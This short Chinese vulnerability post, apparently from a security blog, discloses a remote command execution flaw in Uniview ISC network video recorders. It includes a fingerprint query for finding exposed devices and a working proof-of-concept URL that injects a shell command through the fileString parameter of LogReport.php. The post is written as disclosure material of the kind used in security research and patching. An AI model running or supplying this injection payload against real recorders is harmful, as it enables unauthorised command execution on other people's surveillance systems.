浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞

漏洞描述

浙江宇视科技 网络视频录像机 ISC /Interface/LogReport/LogReport.php 页面,fileString 参数过滤不严格,导致攻击者可执行任意命令。

漏洞影响

浙江宇视科技 网络视频录像机 ISC

网络测绘

app=”uniview-ISC”

漏洞复现

登录页面

20240327111549114-1645887597864-478bdd00-527b-4a78-a161-f7bbf022a0d5.520e3f7e_2024-03-27_11-15-31 (1)

验证POC

/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;id>1.txt

20240327111656506-1645887664378-917e4c3f-62cc-4dd2-9faa-eb8aeadd734d.23eca2c3_2024-03-27_11-16-30

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容